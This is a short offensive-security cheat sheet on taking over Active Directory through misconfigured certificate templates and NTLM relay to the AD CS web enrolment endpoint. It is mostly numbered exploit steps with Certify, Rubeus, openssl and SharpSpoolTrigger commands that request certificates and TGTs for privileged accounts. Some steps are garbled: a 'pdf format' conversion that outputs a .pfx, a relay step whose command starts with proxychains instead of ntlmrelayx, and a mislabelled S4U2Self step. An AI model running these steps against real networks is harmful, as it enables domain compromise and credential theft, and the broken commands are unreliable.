Active Directory Certificate Services (AD CS) is a customizable service for issuing and managing digital certificates. These digital certificates can be used for the authentication of computer, user, or device accounts on a network.

Misconfigured Certificate Templates

This configuration allows any domain user to request a certificate for any other domain user and use it for authentication.
To check if there is any vulnerable template, you can execute the following command.
If "<DOMAIN>\Domain Users" have enrollment rights, it means any domain user may request a certificate from this template.
.\Certify.exe find /vulnerable
These are the steps to exploit this vulnerability.
1. Request a certificate for a user with high privileges on the domain, then save the private key and certificate into a file like cert.pem.
2. Convert the cert.pem into pdf format.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
3. Base64 encode the certificate to use it with Rubeus.
cat cert.pfx | base64 -w 0
4. Request a TGT using the encoded certificate.
.\Rubeus.exe asktgt /user:Administrator /nowrap /password:<EXPORTING_PASSWORD> /certificate:<BASE64>

NTLM Relaying to ADCS HTTP Endpoints

Useful for when you have the CA running on a web service and authentication via NTLM. In this case you can force a DC to authenticate to an attacker's machine and then use it to obtain a TGT.
AD CS services support HTTP enrolment methods and even includes a GUI. This endpoint is usually found at http[s]://<hostname>/certsrv
You cannot relay NTLM authentication back to the originating machine. We therefore wouldn't be able to relay a DC to a CA if those services were running on the same machine.
Another good way to abuse this primitive is by gaining access to a machine configured for unconstrained delegation.
These are the steps to exploit this vulnerability.
1. Execute ntlmrelayx pointing to the web CA on the attacker machine.
sudo proxychains -t https://<ADCS>/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
2. Force the DC to authenticate against the attacker machine. The certificate will appear on the ntlmrelayx tool.
You can use any of the programs on Unconstrained Delegation.
.\SharpSpoolTrigger.exe <TARGET_DC> <ATTACKER_MACHINE>
3. Use the S4U2Self to obtain the TGT.
.\Rubeus.exe asktgt /user:<HOSTNAME>$ /ptt /certificate:<NTLM_CERTICIFATE>
Last modified 15d ago